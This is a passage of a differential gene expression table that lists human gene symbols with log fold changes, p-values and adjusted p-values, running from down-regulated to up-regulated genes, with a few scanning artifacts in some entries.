129.03E−12GNG7−1.852.37E−131.19E−12RTN2−1.852.10E−097.55E−09SEMA3B−1.842.45E−161.52E−15IL6−1.845.35E−173.49E−16LOC644961−1.841.43E−116.24E−11JPX−1.837.74E−113.17E−10CHCHD6−1.837.00E−195.14E−18PNPLA6−1.833.33E−862.77E−84FBLN1−1.825.31E−338.33E−32SIDT2−1.815.19E−401.07E−38DEPTOR−1.811.85E−107.26E−10ZNF826P−1.811.25E−084.21E−08TTC39A−1.814.87E−173.18E−16TM7SF2−1.811.91E−679.80E−66ELMO3−1.812.54E−222.33E−21OOEP−1.818.06E−103.00E−09DNAJC17−1.811.40E−147.72E−14TCEA2−1.801.83E−363.29E−35SLC22A18−1.801.89E−191.45E−18ALDH3B1−1.803.28E−681.70E−66LOC100130872−1.806.08E−102.30E−09ETFA−1.791.34E−1362.74E−134THYN1−1.799.07E−411.92E−39AKR1C3−1.781.37E−105.47E−10MT1F−1.781.45E−084.86E−08PIP5KL1−1.782.53E−109.85E−10ATP5D−1.781.68E−444.13E−43TMEM120A−1.771.49E−251.64E−24OSBPL5−1.773.00E−091.06E−08TENC1−1.772.65E−181.89E−17EPHX2−1.763.95E−142.10E−13WDR83−1.764.37E−264.99E−25RUVBL2−1.758.63E−1471.95E−144KAZALD1−1.756.39E−225.77E−21RPA3−1.746.68E−411.42E−39NOXA1−1.741.23E−094.49E−09TMEM110-MUSTN1−1.745.21E−081.65E−07CACNA2D2−1.748.47E−103.14E−09DICER1-AS1−1.735.04E−101.91E−09ABHD14A-ACY1−1.731.20E−362.19E−35GRAMD2−1.735.14E−081.63E−07PPIH−1.732.97E−192.25E−18STXBP2−1.732.73E−721.55E−70C10orf10−1.733.54E−213.02E−20PLA2G6−1.735.59E−142.93E−13CHEK2−1.721.79E−464.82E−45SPAG4−1.722.30E−151.34E−14COG6−1.719.36E−371.71E−35TBC1D17−1.717.78E−247.79E−23IFT52−1.716.78E−381.30E−36GARNL3−1.717.22E−112.96E−10DLST−1.702.44E−252.67E−24ACSF2−1.693.58E−131.77E−12RYR1−1.694.48E−091.57E−08LOC100134713−1.683.06E−121.41E−11P2RY6−1.687.55E−216.27E−20RARRES3−1.683.75E−071.09E−06C11orf80−1.675.34E−142.81E−13ELF3−1.672.30E−486.58E−47ADCK4−1.672.68E−405.60E−39GLB1L−1.675.33E−142.80E−13LPPR3−1.671.58E−241.66E−23CDK7−1.671.76E−363.16E−35SLC6A3−1.668.34E−082.58E−07ADAM22−1.662.07E−129.64E−12EIF3K−1.661.65E−981.73E−96S100A4−1.657.75E−102.89E−09ANXA6−1.652.84E−852.35E−83IFT140−1.651.33E−251.48E−24PDIA5−1.651.47E−231.44E−22FADS3−1.652.21E−486.32E−47KCNK15−1.644.58E−213.89E−20FKBP10−1.648.94E−411.89E−39ACSS2−1.641.07E−941.06E−92GSTA4−1.642.80E−314.04E−30KCNMB4−1.648.53E−072.38E−06RPLP2−1.633.48E−2201.52E−217UROS−1.632.54E−425.73E−41IFT27−1.634.67E−193.49E−18TRAPPC9−1.636.82E−288.44E−27ADAMTSL4−1.625.48E−431.28E−41EIF3E−1.623.34E−2481.69E−245ACY1−1.622.83E−303.87E−29MT1X−1.624.27E−244.36E−23LOC643406−1.614.55E−162.79E−15FBXO36−1.611.48E−148.12E−14PACSIN1−1.615.93E−081.87E−07NIT2−1.614.39E−451.10E−43FUZ−1.603.08E−121.42E−11RPL37−1.602.00E−3011.27E−298ALDH4A1−1.602.17E−171.45E−16PDCD5−1.606.19E−652.92E−63MFSD3−1.603.51E−315.00E−30EML3−1.601.27E−645.92E−63PSMA3−1.601.93E−961.96E−94TRPT1−1.592.64E−232.56E−22ALDH6A1−1.599.68E−218.00E−20LOC283038−1.593.12E−111.32E−10BDH2−1.591.27E−178.59E−17SDHB−1.591.43E−707.78E−69ARHGEF25−1.591.35E−291.79E−28CYS1−1.584.38E−081.40E−07C8orf45−1.584.42E−081.41E−07GLTSCR2−1.574.94E−461.30E−44JMJD8−1.573.93E−284.90E−27ANKRD24−1.571.17E−073.56E−07SNURF−1.576.25E−683.23E−66SNRPN−1.576.43E−683.31E−66RCN3−1.571.28E−157.56E−15LACTB2−1.572.50E−781.75E−76HSF4−1.561.23E−136.27E−13ENDOV−1.564.24E−091.48E−08CPT1C−1.554.07E−071.17E−06ITFG1−1.551.10E−889.66E−87IL11RA−1.552.61E−111.12E−10FRG1−1.552.08E−086.87E−08CCDC104−1.548.93E−311.25E−29CERS1−1.544.07E−081.30E−07GDF1−1.544.07E−081.30E−07USP4−1.544.05E−132.00E−12PLCD1−1.546.66E−143.47E−13PBXIP1−1.545.25E−379.70E−36NDUFC1−1.541.61E−423.66E−41CEP70−1.545.71E−592.29E−57MFSD4−1.542.40E−077.10E−07ARPC4-TTLL3−1.533.34E−253.64E−24XRCC1−1.537.89E−351.33E−33CLDN4−1.522.47E−202.00E−19VWA5A−1.527.77E−102.90E−09PC−1.521.73E−201.41E−19MMP11−1.521.58E−095.74E−09C9orf84−1.521.04E−281.33E−27SLC37A2−1.521.08E−062.99E−06SUPT3H−1.525.13E−122.33E−11SLC44A3−1.521.17E−115.15E−11UNC93B1−1.526.48E−371.19E−35SLC38A6−1.521.32E−136.69E−13NDUFA1−1.514.88E−401.01E−38TMEM205−1.514.08E−377.58E−36ZCRB1−1.512.46E−882.13E−86BRSK1−1.507.65E−102.86E−09HDAC5−1.503.47E−335.53E−32RNASEH2B−1.501.90E−221.76E−21CLASRP−1.504.14E−233.98E−22CAMK1−1.501.12E−211.00E−20C11orf10−1.491.26E−422.91E−41PRKCSH−1.495.06E−1299.41E−127PMF1-BGLAP−1.493.71E−346.12E−33NFASC−1.491.16E−052.86E−05LTBP4−1.492.21E−619.29E−60LAMA5−1.492.31E−1606.08E−158LRSAM1−1.495.65E−266.42E−25CTSH−1.486.14E−318.67E−30HEXB−1.487.22E−1088.96E−106MGST2−1.481.97E−097.13E−09FAH−1.488.07E−227.23E−21PEX7−1.482.91E−141.56E−13C5−1.481.05E−114.64E−11ACADS−1.482.02E−211.76E−20IFT43−1.479.38E−155.24E−14JAK3−1.476.46E−122.90E−11MRPL39−1.471.89E−454.88E−44SLC43A1−1.473.84E−081.23E−07EFEMP2−1.479.20E−072.56E−06SSBP4−1.471.48E−148.14E−14IMMP1L−1.471.82E−075.46E−07GPR108−1.471.33E−605.50E−59WDR54−1.464.01E−387.75E−37ARHGAP8−1.464.37E−142.32E−13RPL35A−1.468.72E−1832.76E−180GBP2−1.467.43E−123.31E−11TECR−1.461.15E−736.86E−72AUH−1.461.97E−086.54E−08PRR5-ARHGAP8−1.461.99E−141.08E−13LINC00263−1.457.89E−175.07E−16PDLIM2−1.452.48E−446.06E−43RASA2−1.451.41E−191.09E−18PTPN6−1.451.25E−362.27E−35PARL−1.452.07E−651.00E−63CERCAM−1.451.71E−741.04E−72RPL37A−1.453.14E−2011.14E−198ARRDC3−1.452.82E−842.26E−82NAE1−1.451.38E−789.72E−77MYZAP−1.457.55E−092.60E−08FBXO2−1.443.57E−233.45E−22C1QL1−1.441.45E−181.05E−17FDPS−1.441.12E−2084.30E−206FER1L4−1.442.19E−343.63E−33TMEM8B−1.442.90E−243.00E−23THOC6−1.441.49E−312.17E−30DMPK−1.439.94E−261.1 IE−24RNF181−1.431.88E−424.26E−41GUK1−1.433.52E−943.37E−92GHDC−1.432.52E−151.47E−14GRAMD1A−1.431.76E−709.52E−69SYTL2−1.433.67E−253.98E−24LEPR−1.437.79E−227.01E−21FLJ22184−1.439.59E−186.57E−17EXOSC9−1.425.87E−471.59E−45MMAB−1.422.1 IE−374.00E−36KRT86−1.421.20E−052.96E−05ABHD1−1.427.52E−082.34E−07HOOK2−1.421.59E−221.48E−21PCSK4−1.421.40E−105.56E−10TMC6−1.421.82E−282.31E−27GDPD1−1.426.19E−061.57E−05LRRC23−1.425.41E−112.25E−10PION−1.423.83E−121.75E−11BCL7C−1.429.48E−371.73E−35YPEL3−1.412.79E−101.08E−09RAD51B−1.417.17E−154.03E−14ANXA4−1.413.39E−641.55E−62B4GALNT4−1.418.74E−134.18E−12COX7B−1.411.11E−665.56E−65PRKCZ−1.411.76E−151.03E−14RAB4B−1.412.43E−212.10E−20C4orf34−1.401.44E−382.81E−37STXIO−1.402.42E−151.41E−14CRELD2−1.405.50E−245.57E−23ATP5E−1.396.27E−935.87E−91ESD−1.391.48E−759.39E−74MIA-RAB4B−1.391.84E−211.61E−20NDUFA13−1.395.54E−582.17E−56SNX14−1.393.32E−752.09E−73MRPL13−1.392.86E−446.97E−43PTPRH−1.397.14E−184.93E−17BBS5−1.392.36E−323.55E−31LMBRD1−1.384.17E−254.50E−24IQCH−1.384.75E−081.51E−07LMTK3−1.384.13E−142.19E−13MIR497HG−1.386.24E−122.81E−11C6orf70−1.383.13E−253.41E−24FGGY−1.385.12E−071.46E−06UNC5CL−1.381.66E−085.52E−08DUT−1.388.03E−1141.13E−111P2RX4−1.382.17E−201.76E−19HHIPL2−1.384.20E−061.09E−05COX5A−1.383.09E−792.21E−77CKLF−1.376.08E−349.94E−33CRYZL1−1.377.16E−278.45E−26GSTM4−1.376.05E−204.80E−19DNAH14−1.373.44E−111.45E−10TCTN1−1.376.80E−123.05E−11CBX3P2−1.362.01E−065.42E−06PTH1R−1.360.0001339110.000291689SEMA6C−1.362.31E−098.29E−09PIR−1.362.10E−313.03E−30DRAP1−1.362.70E−1012.90E−99SCP2−1.361.15E−125.47E−12GMDS−1.368.89E−186.10E−17FRG1B−1.369.55E−134.56E−12DECR1−1.354.15E−357.08E−34CTAGE5−1.354.25E−408.82E−39NPM3−1.351.82E−403.82E−39AASS−1.352.75E−056.49E−05ZC3H6−1.351.1 IE−291.48E−28C6orf203−1.352.06E−086.82E−08ADAMTS13−1.351.19E−115.23E−11UBXN11−1.352.01E−065.42E−06C10orf54−1.353.00E−631.32E−61LSS−1.357.02E−411.49E−39KLC4−1.357.74E−092.66E−08ITGB3BP−1.356.76E−112.78E−10TKTL1−1.352.72E−121.26E−11C10orf55−1.341.16E−635.16E−62CRELD1−1.341.99E−201.62E−19ADSSL1−1.342.20E−211.91E−20ALKBH7−1.341.62E−271.97E−26AIFM3−1.345.13E−071.47E−06LLGL2−1.342.44E−098.76E−09SLC27A1−1.341.99E−139.99E−13ZBTB8OS−1.345.50E−204.37E−19ANKRD13D−1.347.36E−257.86E−24C6orf57−1.343.31E−079.64E−07GCAT−1.338.16E−103.04E−09TEX9−1.331.32E−053.23E−05MAP2K5−1.339.00E−113.66E−10SLC27A2−1.332.27E−211.97E−20LTBP3−1.332.53E−435.95E−42LOC100287559−1.334.09E−059.47E−05IFITM10−1.339.64E−093.28E−08CRYL1−1.336.22E−102.34E−09USH1C−1.334.48E−091.57E−08ZC3H12D−1.330.0003309010.000684453ERI2−1.327.33E−092.53E−08TBX6−1.320.0008996710.001760238WBSCR22−1.321.53E−555.53E−54GNB2L1−1.322.65E−2721.40E−269LOC100131089−1.323.24E−081.05E−07EGFL7−1.328.28E−371.52E−35PIM3−1.316.31E−673.18E−65NUCB1−1.311.86E−791.34E−77FDXR−1.311.08E−198.38E−19EMID1−1.312.72E−099.72E−09PIBF1−1.312.54E−161.58E−15HIBCH−1.301.13E−156.72E−15RPS7−1.304.23E−1581.05E−155BIK−1.305.76E−061.47E−05TCP11L2−1.309.98E−072.77E−06TSNAX-DISC1−1.306.33E−225.72E−21OMA1−1.301.35E−251.50E−24LOC100506990−1.303.51E−091.24E−08TSTD1−1.307.46E−289.23E−27KISS1R−1.300.0003860670.000792495BCKDHA−1.292.10E−434.98E−42B9D1−1.293.14E−131.56E−12ZNF695−1.298.45E−103.14E−09TMEM63B−1.292.19E−691.17E−67MOSPD3−1.298.70E−196.37E−18RNASE4−1.292.00E−272.42E−26UGGT2−1.296.04E−215.06E−20SEMA3F−1.292.32E−191.77E−18RPS24−1.296.92E−2142.83E−211DAK−1.294.77E−622.04E−60LOC100130691−1.290.0001987220.0004236CTU2−1.291.68E−138.48E−13PLD3−1.297.26E−451.81E−43RHOV−1.292.06E−151.20E−14CHPT1−1.295.19E−672.64E−65ACSM3−1.293.03E−111.29E−10RPS25−1.284.03E−1851.31E−182OASL−1.282.48E−111.06E−10RPLP1−1.287.23E−2193.05E−216C19orf79−1.282.43E−111.04E−10IL20RB−1.281.18E−094.32E−09CACNG6−1.281.23E−053.02E−05TBCE−1.281.40E−281.78E−27FBXO16−1.280.000191810.000409623LOC100505549−1.289.29E−062.31E−05LOC100507218−1.280.0002139560.000453549TLR5−1.280.0001122730.000247109EML2−1.281.54E−148.42E−14NPM1−1.283.12E−1386.48E−136GAA−1.281.30E−321.99E−31NKD2−1.284.23E−101.61E−09CRIP2−1.288.19E−113.34E−10LOC100132891−1.276.71E−071.89E−06ALG5−1.272.16E−161.35E−15PXK−1.271.02E−145.67E−14ADA−1.276.1 IE−143.20E−13GALE−1.273.38E−458.55E−44PHGDH−1.273.96E−1135.44E−111CREG2−1.270.0004265560.000871508MSLN−1.272.53E−191.93E−18GDPD5−1.271.22E−125.80E−12ITGA7−1.275.07E−061.30E−05LIG1−1.271.36E−271.66E−26LRTOMT−1.264.37E−061.13E−05C17orf49−1.261.37E−443.39E−43HMGN5−1.265.93E−071.69E−06LOC100505624−1.264.04E−101.55E−09CATSPER1−1.250.0009492240.00184719TLE2−1.252.35E−161.46E−15CES3−1.255.98E−071.70E−06TTC35−1.257.52E−301.01E−28C6orf72−1.252.65E−334.23E−32RPS19−1.251.01E−1682.84E−166EVI5L−1.253.82E−233.68E−22LOC81691−1.257.76E−113.17E−10PLEKHH3−1.255.91E−391.17E−37LOC100507501−1.241.34E−063.67E−06SLC25A5-AS1−1.242.22E−201.80E−19RPS8−1.241.41E−2015.25E−199PPP1R7−1.243.54E−376.58E−36MAGED2−1.244.04E−418.64E−40CSTF3−1.241.10E−125.24E−12LINC00467−1.241.39E−179.42E−17MAD2L2−1.244.26E−295.54E−28PCCB−1.242.05E−536.87E−52SEZ6L2−1.241.72E−272.09E−26FKBP2−1.248.99E−301.20E−28DOCK6−1.244.80E−358.13E−34WIPI1−1.242.07E−065.57E−06ECH1−1.235.12E−763.32E−74OCEL1−1.237.19E−143.74E−13ZNF385C−1.232.37E−066.31E−06ATP8B3−1.236.42E−246.47E−23PAFAH1B2−1.238.05E−258.57E−24TM4SF19-TCTEX1D−1.231.23E−053.02E−05SRPX−1.235.84E−112.42E−10SLC39A11−1.233.03E−212.60E−20TMEM41B−1.225.82E−092.02E−08PADI2−1.223.51E−111.48E−10STX4−1.228.39E−281.03E−26MAP4K2−1.221.86E−201.51E−19PXMP4−1.222.50E−077.39E−07TCIRG1−1.222.38E−415.15E−40SERPING1−1.228.23E−082.55E−07IFI35−1.224.92E−132.41E−12DPY19L1P1−1.223.99E−071.15E−06MAN2B1−1.225.94E−481.67E−46FAF1−1.225.28E−511.65E−49ZDHHC1−1.222.34E−066.25E−06NAAA−1.214.63E−111.93E−10EFCAB11−1.214.21E−059.73E−05HSCB−1.211.67E−127.85E−12FBXW9−1.212.21E−055.28E−05ZNF467−1.211.19E−094.36E−09ILVBL−1.211.32E−443.28E−43SDR16C5−1.214.72E−173.09E−16IQGAP2−1.216.21E−071.76E−06SRGAP3−1.212.76E−056.50E−05EGF−1.210.0001083190.000238866ERGIC3−1.212.97E−631.31E−61CYFIP2−1.213.35E−141.79E−13BCAS3−1.215.34E−235.11E−22DOCK11−1.213.15E−111.33E−10SLC37A1−1.211.67E−075.02E−07HSD17B4−1.211.16E−544.10E−53NT5M−1.217.71E−050.000172918SERINC5−1.202.82E−067.46E−06CCDC85B−1.209.58E−959.54E−93ALDH7A1−1.201.18E−615.00E−60OPLAH−1.201.60E−211.41E−20ASNS−1.204.29E−1065.17E−104KIFAP3−1.204.03E−264.60E−25C1R−1.202.83E−078.29E−07FRY−1.200.0009209010.001797881ANO9−1.207.19E−072.02E−06BCAM−1.207.19E−331.1 IE−31MED30−1.201.06E−135.46E−13LOC100127983−1.206.85E−061.73E−05CBS−1.201.10E−554.00E−54PNPLA2−1.197.09E−371.30E−35C1QL4−1.191.08E−073.32E−07LOC100129716−1.190.0003637910.000749078ANKRD36BP2−1.190.0002878630.000599766LCMT1−1.197.16E−133.45E−12SHF−1.193.46E−069.04E−06RABGGTA−1.192.76E−101.07E−09ANKRA2−1.194.84E−152.76E−14SYT12−1.198.47E−206.64E−19PYROXD2−1.192.34E−066.25E−06COPG2−1.192.42E−354.16E−34RAP1GAP−1.191.26E−084.24E−08LOC728743−1.182.13E−055.11E−05SRI−1.185.42E−431.27E−41DDX43−1.182.82E−232.74E−22PRIM1−1.181.39E−291.85E−28FAM125A−1.182.67E−161.65E−15HCFC1R1−1.186.80E−522.20E−50THBS3−1.183.57E−182.51E−17C15orf48−1.186.58E−308.85E−29C11orf54−1.187.03E−184.86E−17CTSF−1.185.63E−266.40E−25CDH3−1.184.89E−591.96E−57ULK4−1.180.0007770110.001532576C1S−1.176.98E−050.00015741VSIG1−1.170.0003725120.00076579MED25−1.176.05E−194.47E−18AIG1−1.177.65E−174.93E−16VAV1−1.172.41E−141.30E−13PPA2−1.171.32E−332.13E−32FAM98C−1.175.33E−050.000121815FCGRT−1.171.69E−261.95E−25EXOSC8−1.171.71E−251.88E−24TMEM160−1.171.88E−118.15E−11SREBF1−1.172.51E−323.78E−31Clorf172−1.178.99E−062.24E−05MSI2−1.171.73E−117.52E−11IMPA2−1.176.70E−361.17E−34IGFBP6−1.171.04E−187.55E−18EIF2D−1.177.55E−482.12E−46LTA4H−1.167.60E−764.88E−74ASL−1.167.72E−289.53E−27ETHE1−1.161.72E−231.69E−22RPH3AL−1.164.72E−213.99E−20KLHDC2−1.162.62E−741.59E−72FAM171A2−1.162.02E−097.29E−09IFT88−1.162.41E−077.15E−07SIGIRR−1.161.53E−053.72E−05SUGT1−1.161.60E−191.23E−18TXNIP−1.163.34E−079.72E−07GTF2H2D−1.160.0001027220.000227077REEP6−1.151.93E−181.38E−17AAAS−1.155.67E−349.29E−33CDKL2−1.150.0006111090.001221929MRC2−1.152.67E−324.02E−31RPN2−1.154.07E−1771.26E−174FN3K−1.155.62E−112.33E−10ST14−1.155.82E−112.41E−10GRAPL−1.150.0023211220.004253204CUEDC2−1.152.06E−282.59E−27IFI30−1.151.81E−086.01E−08C9orf46−1.151.24E−125.89E−12ABCA5−1.151.85E−075.53E−07RPGR−1.152.48E−077.34E−07PKN1−1.152.23E−841.80E−82ATG16L2−1.151.06E−062.95E−06WBSCR27−1.153.77E−069.80E−06LRRC45−1.141.24E−178.40E−17PTMS−1.141.81E−791.31E−77CKLF-CMTM1−1.141.06E−166.72E−16BTC−1.143.10E−057.27E−05TNFSF12-TNFS"13−1.147.55E−195.53E−18PREX1−1.144.53E−091.58E−08FGD3−1.147.45E−050.000167354PCIF1−1.142.14E−343.56E−33CALB2−1.143.17E−068.33E−06PTGES−1.143.74E−213.18E−20HES7−1.130.0038037940.00674057FGFR4−1.138.06E−248.07E−23NFKBID−1.130.000946510.001842867BMP1−1.131.37E−312.00E−30MSI1−1.130.0024644280.004500152RPS6KB2−1.132.74E−202.21E−19KCTD19−1.133.06E−068.06E−06CCDC88B−1.131.55E−116.73E−11SCNN1A−1.134.23E−357.21E−34POMGNT1−1.138.85E−411.88E−39HECTD2−1.130.0015883050.002987874NUP107−1.132.10E−547.31E−53CXCL16−1.135.14E−122.33E−11GAPDHS−1.130.0019146220.003556771CDC42BPG−1.133.79E−081.22E−07MLXIPL−1.126.00E−061.53E−05IFI27L1−1.121.31E−136.68E−13ABCA7−1.125.03E−327.44E−31CREB3L4−1.128.76E−175.61E−16COPE−1.121.68E−312.44E−30PEMT−1.124.08E−081.31E−07PKN3−1.122.05E−129.57E−12UQCRC1−1.123.06E−842.42E−82DNAJC4−1.122.58E−151.50E−14FAM175A−1.123.67E−058.54E−05FIBP−1.121.34E−483.86E−47KCNN1−1.121.14E−052.82E−05RQCD1−1.125.66E−194.19E−18JUNB−1.119.88E−502.95E−48ASPSCR1−1.115.66E−132.76E−12QPCTL−1.114.68E−255.04E−24CD9−1.113.02E−942.91E−92SH2B2−1.116.68E−050.000151083SSR4−1.111.05E−198.16E−19NDUFA2−1.118.18E−195.99E−18ALPK1−1.111.89E−161.19E−15GFM2−1.111.22E−544.29E−53GPCPD1−1.118.79E−196.43E−18NDRG2−1.111.37E−063.74E−06PRSS22−1.110.0020804350.003844256MST1P9−1.110.0022665270.004161499TRIM9−1.110.0002049240.000435644ATP2A3−1.114.09E−091.44E−08TMEM161A−1.112.06E−129.63E−12ING4−1.115.53E−081.75E−07METTL5−1.119.00E−341.46E−32IFT74−1.112.99E−111.27E−10GALT−1.109.23E−144.76E−13ZCWPW2−1.102.10E−323.17E−31USH1G−1.100.0026198290.004769462FAM162A−1.101.90E−181.36E−17BCL3−1.103.72E−469.84E−45TSPAN1−1.109.28E−124.1 IE−11SIPA1−1.102.57E−252.80E−24WDR27−1.108.86E−072.47E−06LOC678655−1.102.98E−091.06E−08MATN2−1.103.00E−171.98E−16SERPINI1−1.107.67E−072.15E−06NPRL2−1.108.74E−123.88E−11IRF6−1.103.53E−111.49E−10C17orf57−1.109.25E−062.30E−05HSPB11−1.102.47E−111.06E−10LOXL2−1.102.56E−1194.1 IE−117GATS−1.103.88E−071.12E−06POLD1−1.103.61E−386.98E−37KREMEN2−1.100.0009063450.001771925SH3YL1−1.097.15E−184.93E−17HEXDC−1.093.33E−081.08E−07CHIC2−1.095.08E−050.000116308FLJ39051−1.090.0004440450.000904903ALKBH6−1.094.88E−091.70E−08MAGOH−1.091.09E−146.06E−14LOC100505783−1.091.52E−053.70E−05C16orf62−1.091.35E−241.42E−23GAL3ST1−1.090.0040912790.00721967ZNF670-ZNF695−1.096.71E−071.89E−06UGCG−1.092.19E−496.44E−48AS3MT−1.090.0003264420.000675804GRTP1−1.092.37E−055.64E−05AQP3−1.093.02E−089.82E−08TMEM45B−1.097.62E−143.95E−13ZP3−1.092.43E−087.96E−08AP4M1−1.098.43E−092.89E−08PLD1−1.092.70E−067.14E−06CCBL2−1.092.76E−202.23E−19NR4A1−1.084.86E−214.10E−20BRE−1.081.97E−333.15E−32PCYOX1L−1.083.06E−151.77E−14KIAA1456−1.084.80E−050.000110264AARS−1.081.30E−1924.43E−190MRPL47−1.082.55E−161.58E−15ERP44−1.084.10E−429.20E−41ARHGEF16−1.085.13E−132.51E−12TP53TG1−1.081.83E−054.40E−05FA2H−1.081.77E−085.89E−08ADAM15−1.074.71E−732.73E−71STAG3−1.070.0057183520.00986248PTK2B−1.074.07E−142.16E−13NSMCE1−1.075.38E−183.74E−17ATXNIO−1.079.31E−826.97E−80CCDC53−1.073.48E−152.01E−14MIPEP−1.074.92E−101.87E−09TNFAIP2−1.071.57E−1463.48E−144PSMA5−1.071.18E−412.60E−40INSIG1−1.078.19E−552.90E−53KIAA1383−1.074.15E−061.07E−05SDC2−1.073.27E−057.64E−05COX5B−1.077.29E−321.08E−30DTX4−1.072.75E−067.28E−06LOC100289495−1.077.59E−050.000170296BIN1−1.078.92E−113.62E−10CLDN7−1.072.52E−171.68E−16LMF1−1.071.18E−052.90E−05C11orf93−1.070.0001802530.000386051C1RL−1.062.49E−303.42E−29MTMR11−1.068.82E−206.91E−19CST6−1.064.12E−162.53E−15CRISPLD1−1.061.71E−075.16E−07PFKL−1.063.28E−731.92E−71IER5L−1.061.03E−198.04E−19NUDT17−1.062.65E−077.80E−07RABAC1−1.069.34E−311.31E−29ABCA2−1.062.56E−497.50E−48TRAP1−1.061.61E−761.05E−74BBS9−1.061.98E−118.56E−11MMP15−1.063.72E−274.45E−26SCPEP1−1.064.13E−223.76E−21TLL2−1.064.28E−059.90E−05VPS28−1.063.44E−192.60E−18TCN2−1.069.31E−072.59E−06HS1BP3−1.065.55E−204.41E−19HMG20B−1.069.18E−847.22E−82FUCA1−1.064.76E−183.32E−17ARHGEF7−1.051.63E−117.10E−11WDR33−1.056.18E−102.33E−09SYT13−1.050.0046699620.008171303C16orf13−1.053.16E−243.26E−23KTN1−1.056.31E−915.75E−89GPX4−1.054.33E−823.26E−80RPS16−1.052.85E−1073.46E−105AGXT2L2−1.051.67E−127.88E−12TMEM141−1.051.52E−181.09E−17LAMP3−1.054.66E−061.20E−05CDKN1C−1.050.0004240190.000866884LOC100288846−1.050.0009880060.001917938DHRS12−1.050.0082370240.013823818ATP6AP1L−1.050.0081913150.013754406ERCC2−1.054.13E−233.98E−22FMO5−1.050.0086520570.014449416ULK2−1.058.06E−206.33E−19SMARCD3−1.052.06E−086.82E−08PHYHD1−1.054.25E−111.78E−10C10orf11−1.050.0033541350.006000913KRTCAP3−1.050.0002035470.000433154SRP54−1.052.70E−882.32E−86IMMP2L−1.042.06E−076.13E−07CARS−1.043.50E−448.52E−43RPL24−1.045.98E−763.86E−74GSN−1.043.51E−172.31E−16BAI2−1.049.31E−165.58E−15WDR18−1.041.17E−463.16E−45ZC4H2−1.040.0094009040.015597066EIF3M−1.044.78E−591.93E−57SLC25A42−1.047.39E−082.30E−07MTHFR−1.042.62E−101.02E−09ABCG2−1.040.0033497060.005994684NR1H3−1.040.0005059230.001023253PAAF1−1.042.18E−211.90E−20GSTK1−1.041.65E−373.13E−36DEPDC4−1.040.0001250310.000273146ZNF396−1.042.31E−055.51E−05BHLHE40−1.042.30E−661.15E−64TECPR1−1.043.48E−131.72E−12AMN1−1.041.59E−074.80E−07NTPCR−1.043.26E−212.79E−20MVD−1.045.49E−401.13E−38RRAS−1.041.37E−241.44E−23LOC144481−1.030.0015553840.00293074SURF1−1.031.48E−251.64E−24MFF−1.031.03E−981.09E−96MAGED1−1.033.74E−722.11E−70TBL3−1.037.98E−258.51E−24DYX1C1−1.030.0001423570.000309076SLC16A5−1.032.35E−232.30E−22GPRIN2−1.031.03E−104.17E−10LOC100130015−1.032.39E−077.07E−07DDX60−1.030.0002672130.000559136MITD1−1.031.44E−116.27E−11RBP1−1.030.0064673710.011039757TBCA−1.035.18E−338.15E−32ICAM5−1.035.23E−142.75E−13TNFRSF10C−1.030.000234910.000494816CPE−1.037.1 IE−143.70E−13ANK2−1.033.67E−111.54E−10C22orf26−1.030.0004523540.000920647SNX2−1.036.73E−331.04E−31ANXA3−1.031.06E−787.48E−77C15orf58−1.020.001330340.002534258RBX1−1.021.31E−211.16E−20ABCD1−1.024.71E−081.50E−07P4HA3−1.020.0002762130.00057711KRBA2−1.020.0041117530.007253308GLS2−1.020.0002597680.000544639ENDOG−1.025.93E−081.87E−07COX7C−1.026.09E−673.08E−65C8orf59−1.022.88E−202.32E−19RAB11FIP4−1.026.08E−092.11E−08CDKL1−1.028.11E−062.03E−05LOC100133957−1.020.0019195010.003564787DENND1A−1.025.20E−338.18E−32TRAM1−1.021.47E−769.69E−75UPK3B−1.029.22E−072.56E−06ANKRD29−1.021.13E−271.38E−26CHMP5−1.027.09E−562.61E−54CCDC125−1.024.05E−071.17E−06MEF2BNB-MEF2B−1.010.0004760680.000966579PTPRE−1.012.62E−477.25E−46MAGIX−1.010.0126720930.020531485MDP1−1.010.0003163560.000656213SEMA4G−1.012.18E−211.90E−20TRMT11−1.017.49E−102.80E−09TNFRSF9−1.010.0013336960.002540269AMZ2P1−1.011.77E−075.32E−07C7orf10−1.010.0007091620.001406426PRPF40B−1.015.32E−245.39E−23NCOA7−1.018.97E−401.84E−38MPND−1.010.0001823630.000390505C17orf28−1.011.33E−074.04E−07PFDN5−1.011.94E−577.44E−56VWA1−1.011.13E−188.22E−18VPS33B−1.014.79E−112.00E−10PHYHIP−1.002.49E−077.35E−07SUSD2−1.002.55E−293.35E−28CCNA1−1.001.64E−085.47E−08GAMT−1.004.53E−101.72E−09SLC44A2−1.002.72E−415.85E−40ODF2L−1.002.38E−161.48E−15HIST1H1C−1.002.07E−434.93E−42TAF10−1.006.64E−288.23E−27AKT3−1.007.55E−143.92E−13MACROD2−1.000.0088687920.014782098ADAM23−1.001.90E−086.31E−08COQ6−1.002.59E−131.29E−12DLEU2−1.000.0055722570.009628891CAT−1.001.55E−302.14E−29MSMO1−1.004.14E−336.57E−32LOC100506334−1.003.11E−068.17E−06TARS2−1.002.70E−385.25E−37P4HTM−1.001.17E−156.93E−15EBF4−1.000.0011753150.002258326ARHGEF26-AS1−1.000.0001184690.000259887OSGEPL1−1.001.23E−115.41E−11PPFIA3−1.002.52E−055.96E−05C19orf71−1.001.03E−052.56E−05CECR2−1.000.0001176750.000258236NAT14−0.991.20E−136.15E−13FADS2−0.992.47E−791.77E−77CALCOCOl−0.993.84E−182.69E−17APOL1−0.990.0005906290.001183409ITFG3−0.992.53E−395.08E−38KDELC1−0.991.11E−063.05E−06RPL3−0.991.72E−1584.35E−156PLCL20.991.02E−083.47E−08AOC20.995.20E−071.48E−06ZBTB20.993.55E−641.61E−62LOC3876470.992.94E−283.68E−27GDF110.991.84E−424.17E−41LOC1001309920.996.14E−143.21E−13ZNF4070.991.38E−211.22E−20LOC1002886150.992.15E−119.26E−11TEX150.991.21E−493.59E−48PMS2P50.992.22E−108.68E−10TSPYL41.003.02E−314.33E−30FICD1.004.01E−071.16E−06ZNF5871.003.63E−304.94E−29ANKRD501.004.80E−501.46E−48NR5A21.003.61E−069.42E−06ZBTB401.009.91E−301.32E−28SLAMF71.001.57E−116.83E−11LOC1001290461.002.73E−078.03E−07PHLPP21.002.77E−385.37E−37ZNF2671.007.57E−205.95E−19FLNC1.009.43E−1582.29E−155ZNF8501.001.62E−148.85E−14HOXB61.007.96E−279.37E−26RNF341.006.70E−441.61E−42FOXO31.015.30E−307.17E−29HUS11.011.05E−208.65E−20ZNF1851.011.74E−821.33E−80GJA11.016.19E−163.75E−15AP1S21.011.54E−191.19E−18TUBB2A1.019.33E−186.40E−